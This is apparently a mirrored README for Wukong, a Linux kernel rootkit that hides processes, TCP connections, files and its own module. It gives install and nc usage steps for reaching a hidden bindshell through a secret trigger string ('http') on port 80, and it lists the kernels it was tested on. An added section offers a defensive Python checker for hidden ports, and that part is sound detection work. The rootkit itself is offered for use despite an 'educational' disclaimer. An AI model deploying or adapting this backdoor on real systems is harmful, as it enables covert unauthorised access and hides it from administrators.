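This repository is a mirror intended to improve download speed within China; it is synchronized once a day. Original repository: https://github.com/hanj4096/wukong
A rootkit is a concealer, responsible for staying hidden. It is a set of tools made up of binary code, scripts and configuration files that can be used to covertly maintain access to a computer, in order to issue commands and search for data without attracting the system administrator's attention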

README.md

Wukong: a LKM rootkit for Linux kernel 2.6.x, 3.x and 4.x


Note:

    This kernel rootkit is for educational purposes only and shouldn't be used for any illegal activities; use it at your own risk.



Function

    1. Hide Linux Process.
    2. Hide TCP connection.
    3. Hide File/Directory.
    4. Hide wukong.ko.
    5. Redirect a TCP connection to the backdoor server when a specific secret password is supplied.

Usage

    1. Environment:
    ubuntu-14.04 (1.1.1.33) --- (1.1.1.1)ubuntu-14.04
    (client)                          (server)

    2. Test step:
    a. on server
    cd wukong/
    sudo ./install.pl
    sudo nc -k -l 80

    b. on client
    nc 1.1.1.1 80
    http
    ifconfig
    PS: The connection will be redirected to the bindshell.

    nc 1.1.1.1 80
    111111
    PS: An RST will be received.

    nc 1.1.1.1 80
    111111
    aaaaaa
    PS: The connection will be established with TCP 80.

    3. Result:
    a. The bindshell file is hidden.
    b. The TCP 8000 connection is hidden.
    c. The bindshell process is hidden.
    d. wukong.ko is hidden.
    e. If "http" is the first four bytes sent to TCP 80, the connection will be established with the bindshell.
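
A defender's cross-view check for the "TCP 8000 connection is hidden" result above, added here as an example and not part of the wukong repository: it compares the ports the proc listing admits to against the ports the kernel refuses to bind. It assumes the hiding only filters the proc listing and leaves bind() behaviour intact, which has not been verified against wukong's code; the function names and the sample data are constructed.

```python
import errno
import socket

# Constructed /proc/net/tcp content (not captured from a real host): ports 80
# and 22 are listed; nothing is listed for port 8000.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346
   2: 01010101:0016 21010101:C350 01 00000000:00000000 02:000A1B2C 00000000     0        0 12347
"""

def listed_local_ports(proc_text):
    """View 1: every local port the /proc/net/tcp (or tcp6) text admits to, any state."""
    ports = set()
    for line in proc_text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) >= 2 and ":" in fields[1]:    # also skips a second header
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))  # port is hex
    return ports

def port_in_use(port):
    """View 2: ask the kernel to bind the port; EADDRINUSE means a socket holds it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind(("0.0.0.0", port))
            return False
        except OSError as e:
            return e.errno == errno.EADDRINUSE       # EACCES etc. is not evidence

def unlisted_ports_in_use(proc_text, ports, probe=port_in_use):
    """Ports that are held by some socket yet absent from the proc listing."""
    listed = listed_local_ports(proc_text)
    return sorted(p for p in ports if p not in listed and probe(p))

if __name__ == "__main__":
    # Live check: run as root so ports below 1024 can be probed. A hit is a lead
    # to investigate (a short-lived socket can race the two reads), not proof.
    text = ""
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(path) as f:
                text += f.read()
        except OSError:
            pass
    print(unlisted_ports_in_use(text, range(1, 65536)))
```

Because the kernel module itself is described as hidden, the listing should be treated as untrusted input; a port reported here is best confirmed from outside the host, for example with a scan from another machine.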


Tested OS:

    CentOS-5.5-i386-bin-DVD.iso
        Linux  2.6.18-408.el5 #1 SMP Tue Jan 19 09:13:33 EST 2016 i686 i686 i386 GNU/Linux
    CentOS-5.5-x86_64-bin-DVD
        Linux 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
    ubuntu-14.04.2-desktop-i386.iso
        Linux  3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
    ubuntu-14.04.2-desktop-amd64.iso   
        Linux  3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    ubuntu-14.04.3-desktop-i386.iso
        Linux  3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
    ubuntu-14.04.3-desktop-amd64.iso
        Linux  3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


ToDo:

    Do performance tuning so that it can work on Linux servers with heavy traffic.
    Add more features.
